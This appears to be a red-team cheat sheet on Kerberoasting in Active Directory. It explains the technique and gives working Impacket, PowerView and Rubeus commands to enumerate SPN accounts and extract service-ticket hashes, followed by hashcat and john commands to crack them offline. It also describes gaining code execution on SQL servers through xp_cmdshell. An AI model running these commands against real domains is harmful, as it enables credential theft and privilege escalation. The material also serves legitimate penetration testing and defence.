Kerberoasting

ABOUT

Kerberoasting is a lateral movement/privilege escalation technique in Active Directory environments. This attack targets Service Principal Name (SPN) accounts.

Domain accounts are often used to run services to overcome the network authentication limitations of built-in accounts such as NT AUTHORITY\LOCAL SERVICE.

Any domain user can request a Kerberos ticket for any service account in the same domain.

It works because in Kerberos protocol if you have TGT, KDC implies you are honest domain member, so it can give you ST (which is encrypted with Service Account's password). But then if you would try to access service, Service will check UAC and ACL, and deny you're access. The vulnerability is that any user can ask for TGS, and because of it we can.

---

1. Look for juicy Kerberoastable account with SPN's to use.

2. Extract TGS Tickets.

3. Crack it and get a creds (You can't use hash for PtH, only crack it).

---

This is also possible across forest trusts if authentication is permitted across the trust boundary.

If the password for a domain SQL Server service account is cracked, you are likely to find yourself as a local admin on multiple servers, if not Domain Admin. Even if cracking a ticket obtained via a Kerberoasting attack gives a low-privilege user account, we can use it to craft service tickets for the service specified in the SPN. For example, if the SPN is set to MSSQL/SRV01, we can access the MSSQL service as sysadmin, enable the xp_cmdshell extended procedure and gain code execution on the target SQL server.

Prerequisites

We could execute Kerberoasting from various setups like (shell / creds are must-have):

• Non-domain Linux machine (Impacket, netexec, hashcat, john, etc).

• Non-domain Windows machine (using runas /netonly).

• Domain-joined Windows machine (PowerView, Rubeus, Mimikatz, setspn.exe, etc)

LINUX

GetUserSPNs

Use -outputfile parameter for output into a file

List SPN Accounts

impacket-GetUserSPNs -dc-ip 13.13.13.13 MILITECH.LOCAL/sol.reed

Request all TGS Tickets

impacket-GetUserSPNs -dc-ip 13.13.13.13 MILITECH.LOCAL/sol.reed -request

Target Specific User

impacket-GetUserSPNs -dc-ip 13.13.13.13 MILITECH.LOCAL/sol.reed -request-user songbird

With -target-domain parameter we can do Cross-Forest Kerberoasting

WINDOWS

PowerView

Extract TGS Tickets

PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-DomainUser * -spn | select samaccountname

Target Specific User

PS C:\> Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

Extract all Tickets to CSV

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\crack_tgs.csv -NoTypeInformation

Rubeus

Stats

PS C:\> .\Rubeus.exe kerberoast /stats

Target High-Value Accounts

PS C:\> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

Target Specific User

PS C:\> .\Rubeus.exe kerberoast /user:testuser /nowrap # For RC4 only, use /tgtdeleg

With -Domain parameter we can do Cross-Forest Kerberoasting

CRACKING

IF YOU ARE ON WINDOWS SERVER 2016 OR EARLIER SPECIFY HASH IN RC4 ALGORITHM BECAUSE IT'S EASIER TO CRACK. IF YOU ARE ABOVE 2016's THEN YOU WILL BE DEALING WITH AES ENCRYPTION.

IF HASH BEGINS WITH $krb5tgs$23$* THIS IS RC4 HASH

Checking Supported Encryption Types

PS C:\> Get-DomainUser testuser -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes

Hashcat

1. Convert kirbi to Crackable format

python2.7 kirbi2john.py sqldev.kirbi > crack_tgs_unprocessed

2. Modifying file for Hashcat

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_tgs_unprocessed > crack_tgs

3. Run Hashcat

hashcat -m 13100 crack_tgs /usr/share/wordlists/rockyou.txt # 13100 mode is for RC4

John

1. Convert kirbi to Crackable format

python2.7 kirbi2john.py sqldev.kirbi > crack_tgs

2. Run John

john --wordlist=/usr/share/wordlists/rockyou.txt crack_tgs

RESOURCES

KerberoastingRed Teaming Experiments

Kerberoast | The Hacker Recipes